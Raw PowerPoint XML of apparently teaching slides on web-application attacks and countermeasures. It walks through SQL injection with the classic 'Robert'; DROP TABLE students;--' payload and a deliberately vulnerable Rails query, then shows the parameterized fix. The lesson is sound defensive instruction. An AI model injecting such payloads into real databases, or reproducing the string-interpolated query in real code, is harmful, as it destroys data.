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7" r:id="rId2"/>
    <p:sldId id="258" r:id="rId3"/>
    <p:sldId id="257" r:id="rId4"/>
    <p:sldId id="260" r:id="rId5"/>
    <p:sldId id="261" r:id="rId6"/>
    <p:sldId id="264" r:id="rId7"/>
    <p:sldId id="265" r:id="rId8"/>
    <p:sldId id="262" r:id="rId9"/>
    <p:sldId id="263" r:id="rId10"/>
    <p:sldId id="267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8" r:id="rId21"/>
    <p:sldId id="280" r:id="rId22"/>
    <p:sldId id="282" r:id="rId23"/>
    <p:sldId id="283" r:id="rId24"/>
    <p:sldId id="284" r:id="rId25"/>
    <p:sldId id="266" r:id="rId26"/>
    <p:sldId id="285" r:id="rId27"/>
    <p:sldId id="286" r:id="rId28"/>
    <p:sldId id="259" r:id="rId29"/>
    <p:sldId id="281" r:id="rId30"/>
    <p:sldId id="531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40FF"/>
    <a:srgbClr val="FFCC33"/>
    <a:srgbClr val="FF6633"/>
    <a:srgbClr val="FF3333"/>
    <a:srgbClr val="FF6600"/>
    <a:srgbClr val="FFFF99"/>
    <a:srgbClr val="FF00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4"/>
    <p:restoredTop sz="94679"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0" snapToObjects="1">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="215" d="100"/>
          <a:sy n="215" d="100"/>
        </p:scale>
        <p:origin x="3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F5D5D4C-6641-7E43-9123-EFA9944C219C}" type="datetimeFigureOut">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>4/18/19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2750866-DE83-9547-8FFD-58BBCE2361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US-CERT is the Computer Emergency Response Team for the United States</a:t>
            </a:r>
          </a:p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0A5B53B5-6017-404C-96BD-C45B30AFD00A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14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1DEA7-3E79-2F4A-AAF4-25CE14C89C78}" type="datetimeFigureOut">
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>4/18/19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D5E89-28BD-1243-B60C-DBDF9FA887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26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FA1E2-CBED-A241-8BA8-3C6311CCEE17}" type="datetimeFigureOut">
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>4/18/19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665E5-DAC6-2B45-8D8F-B3DD76F499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3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A7EC7-90AE-FE40-A8B6-FC707761C963}" type="datetimeFigureOut">
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>4/18/19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38D65-8D5A-1046-AA5B-BC5726A723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27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EFC33-1439-614A-A670-C0AA07D83A93}" type="datetimeFigureOut">
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>4/18/19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CD18A-34CE-9042-8A4B-DCAFFFF83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69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1398F-3DFE-8842-91CA-C7797D2CC0B1}" type="datetimeFigureOut">
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>4/18/19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10AEA-1010-EE4C-8787-1BDB385434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52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E1CC2-A488-1E46-A77D-5830D5C8F1DE}" type="datetimeFigureOut">
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>4/18/19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A652B-CD7E-1C45-93B0-066A78306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82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467BD-879E-814D-864E-7F2DF2752EF9}" type="datetimeFigureOut">
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>4/18/19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37999-E805-9747-960D-DF639D4DED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85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F4FDE-0F6C-0D47-83AA-4F99EB86A9AE}" type="datetimeFigureOut">
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>4/18/19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BCFF9-3337-B447-B94F-8B0B60546E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39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A8858-79B7-6E45-AB49-1EE401385EED}" type="datetimeFigureOut">
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>4/18/19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F12FC-22E3-DF45-A97D-7BD127C6DE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30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BBB63-26BC-6046-89CB-262590EF2D8D}" type="datetimeFigureOut">
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>4/18/19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A6FBA-8700-BE4D-85C3-9480221F3C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95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E5240-A3C6-DD43-B6AA-10AF529B1A4E}" type="datetimeFigureOut">
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>4/18/19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B6193-BE21-8245-A83D-B65B8E73A7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60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B24AD95-F66A-9D42-91B8-FDCF808917F5}" type="datetimeFigureOut">
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>4/18/19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B619FB4-FF6F-924A-9F32-F87C746CA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3244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6988"/>
            <a:ext cx="9144000" cy="29305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363538" y="5591175"/>
            <a:ext cx="78853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FFCC33"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Security: Attacks &amp; Countermeasures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8239125" y="3198813"/>
            <a:ext cx="1595438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http://xkcd.com/327/</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13317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99"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="342900" y="1476375"/>
            <a:ext cx="1877786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4" r="53416"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2220686" y="1476375"/>
            <a:ext cx="2066307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07" r="27279"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4286993" y="1476375"/>
            <a:ext cx="2208811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/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6492650" y="1476375"/>
            <a:ext cx="2311235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97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Three Common Web App Attacks and Countermeasures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Attack:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Eavesdropping on network communications</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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Countermeasure:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Encrypt communications with SSL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Why were the student records lost?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169988"/>
            <a:ext cx="9144000" cy="29305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8239125" y="3071813"/>
            <a:ext cx="1595438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http://xkcd.com/327/</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2355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349375"/>
            <a:ext cx="84582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7194550" y="1677988"/>
            <a:ext cx="1231900" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100" cmpd="sng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29413" y="1931988"/>
            <a:ext cx="1957387" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100" cmpd="sng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Why were the student records lost?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169988"/>
            <a:ext cx="9144000" cy="29305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8239125" y="3071813"/>
            <a:ext cx="1595438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http://xkcd.com/327/</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2458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349375"/>
            <a:ext cx="84582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20725" y="4427538"/>
            <a:ext cx="7702550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00FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The name string “Robert'); DROP TABLE Students;--”</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF00FF"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF00FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>injected</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF00FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> malicious code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dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF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00FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>But how can this happen?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194550" y="1677988"/>
            <a:ext cx="1231900" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100" cmpd="sng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29413" y="1931988"/>
            <a:ext cx="1957387" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100" cmpd="sng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2022" y="2173748"/>
            <a:ext cx="1295604" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100" cmpd="sng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04083" y="2427748"/>
            <a:ext cx="1451026" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100" cmpd="sng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Imagine controller that looks up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students by name</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25602" name="TextBox 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="739775" y="1822450"/>
            <a:ext cx="684354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charset="0"/>
              </a:rPr>
              <a:t>id = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>params</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>[:id]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charset="0"/>
              </a:rPr>
              <a:t># =&gt; "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>Robert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>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err="1">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>Student.where</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>("name = '#{id}'")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Imagine controller that looks up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students by name</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26626" name="TextBox 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="739775" y="1822450"/>
            <a:ext cx="684354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charset="0"/>
              </a:rPr>
              <a:t>id = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>params</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>[:id]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charset="0"/>
              </a:rPr>
              <a:t># =&gt; "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>Robert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>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err="1">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>Student.where</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>("name = '#{id}'")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79450" y="3141031"/>
            <a:ext cx="7742238" cy="2827338"/>
            <a:chOff x="679680" y="2753398"/>
            <a:chExt cx="7742227" cy="2826788"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="26628" name="TextBox 3"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="679681" y="4626079"/>
              <a:ext cx="7742226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Courier New" charset="0"/>
                </a:rPr>
                <a:t>SELECT * FROM students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Courier New" charset="0"/>
                </a:rPr>
                <a:t>WHERE name = '</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="en-US" b="1">
                  <a:solidFill>
                    <a:srgbClr val="00FFFF"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New" charset="0"/>
                </a:rPr>
                <a:t>Robert</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="en-US">
                  <a:latin typeface="Courier New" charset="0"/>
                </a:rPr>
                <a:t>';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9680" y="2753398"/>
              <a:ext cx="6838940" cy="453937"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="7620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>
              <a:off x="4099150" y="3207335"/>
              <a:ext cx="0" cy="1418949"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="7620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31" name="TextBox 7"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4265816" y="3457971"/>
              <a:ext cx="383798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FF00FF"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Rails ORM translates to…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What if…?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27650" name="TextBox 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="231775" y="1822450"/>
            <a:ext cx="931227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latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>id = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>params</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>[:id]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latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t># =&gt; "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>Robert'; DROP TABLE students;--</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>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err="1">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>Student.where</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>("name = '#{id}'")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What if…?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28674" name="TextBox 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="231775" y="1822450"/>
            <a:ext cx="931227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latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>id = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>params</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>[:id]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latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t># =&gt; "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>Robert'; DROP TABLE students;--</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>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err="1">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>Student.where</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>("name = '#{id}'")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830263" y="3638331"/>
            <a:ext cx="8313737" cy="3083143"/>
            <a:chOff x="830916" y="3638606"/>
            <a:chExt cx="8313084" cy="3082825"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="28676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28"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5784672" y="4353004"/>
              <a:ext cx="3359328" cy="2368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8677" name="Group 8"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="830916" y="3638606"/>
              <a:ext cx="5549966" cy="2372468"/>
              <a:chOff x="830916" y="3638606"/>
              <a:chExt cx="5549966" cy="2372468"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="28678" name="TextBox 3"/>
              <p:cNvSpPr txBox="1">
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="830916" y="4626079"/>
                <a:ext cx="5549966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Courier New" charset="0"/>
                  </a:rPr>
                  <a:t>SELECT * FROM students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Courier New" charset="0"/>
                  </a:rPr>
                  <a:t>WHERE name = '</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" altLang="en-US" b="1">
                    <a:solidFill>
                      <a:srgbClr val="00FFFF"/>
                    </a:solidFill>
                    <a:latin typeface="Courier New" charset="0"/>
                  </a:rPr>
                  <a:t>Robert';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1">
                    <a:solidFill>
                      <a:srgbClr val="00FFFF"/>
                    </a:solidFill>
                    <a:latin typeface="Courier New" charset="0"/>
                  </a:rPr>
                  <a:t>DROP TABLE students;--</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" altLang="en-US">
                    <a:latin typeface="Courier New" charset="0"/>
                  </a:rPr>
                  <a:t>';</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="7" name="Straight Arrow Connector 6"/>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3875502" y="3638606"/>
                <a:ext cx="0" cy="987541"/>
              </a:xfrm>
              <a:prstGeom prst="straightConnector1">
                <a:avLst/>
              </a:prstGeom>
              <a:ln w="76200" cmpd="sng">
                <a:solidFill>
                  <a:srgbClr val="FF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How to prevent </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" u="sng">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>SQL injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>? </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp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231775" y="1822450"/>
            <a:ext cx="931227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latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>id = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>params</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>[:id]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latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t># =&gt; "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>Robert'; DROP TABLE students;--</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>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err="1">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>Student.where</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>("name = '#{id}'")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How to prevent </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" u="sng">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>SQL injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>? </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30722" name="TextBox 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="231775" y="1822450"/>
            <a:ext cx="931227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latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>id = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>params</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>[:id]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latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t># =&gt; "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>Robert'; DROP TABLE students;--</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>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err="1">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>Student.where</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>("name = '#{id}'")</a:t>
            </a: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005388" y="5285744"/>
            <a:ext cx="3106737" cy="1431925"/>
            <a:chOff x="5005966" y="4896772"/>
            <a:chExt cx="3105548" cy="143319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005966" y="4896772"/>
              <a:ext cx="315791" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="57150" cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="FF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5256695" y="5025473"/>
              <a:ext cx="610953" cy="500508"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="7620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727" name="TextBox 14"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5705311" y="5375863"/>
              <a:ext cx="2406203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FF00FF"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Automatically </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="en-US" u="sng">
                  <a:solidFill>
                    <a:srgbClr val="FF00FF"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>escapes</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="en-US">
                  <a:solidFill>
                    <a:srgbClr val="FF00FF"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> input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DBC9F-6232-CF4A-84F6-F6DD4D2AD77E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="246805" y="3356975"/>
            <a:ext cx="7150945" cy="1955756"/>
            <a:chOff x="246805" y="3356975"/>
            <a:chExt cx="7150945" cy="1955756"/>
          </a:xfrm>
        </p:grpSpPr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259331" y="3595056"/>
              <a:ext cx="7138419" cy="1717675"/>
              <a:chOff x="259568" y="3206465"/>
              <a:chExt cx="7138137" cy="1718120"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="30728" name="TextBox 3"/>
              <p:cNvSpPr txBox="1">
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="259568" y="4401365"/>
                <a:ext cx="713813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Courier New" charset="0"/>
                  </a:rPr>
                  <a:t>Student.where("name = ?", id)</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="7" name="Straight Arrow Connector 6"/>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3602143" y="3206465"/>
                <a:ext cx="4762" cy="1216340"/>
              </a:xfrm>
              <a:prstGeom prst="straightConnector1">
                <a:avLst/>
              </a:prstGeom>
              <a:ln w="76200" cmpd="sng">
                <a:solidFill>
                  <a:srgbClr val="FF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31" name="TextBox 7"/>
              <p:cNvSpPr txBox="1">
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3671044" y="3420888"/>
                <a:ext cx="232840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solidFill>
                      <a:srgbClr val="FF00FF"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Write like this!</a:t>
                </a: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7D13B00-8107-9347-8B92-99B97665D3DD}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="246805" y="3356975"/>
              <a:ext cx="6742718" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="50800">
              <a:solidFill>
                <a:srgbClr val="FF4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Translation becomes…</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp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231775" y="1822450"/>
            <a:ext cx="931227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latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>id = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>params</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>[:id]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latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t># =&gt; "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>Robert'; DROP TABLE students;--</a:t>
            </a:r>
            <a:r>
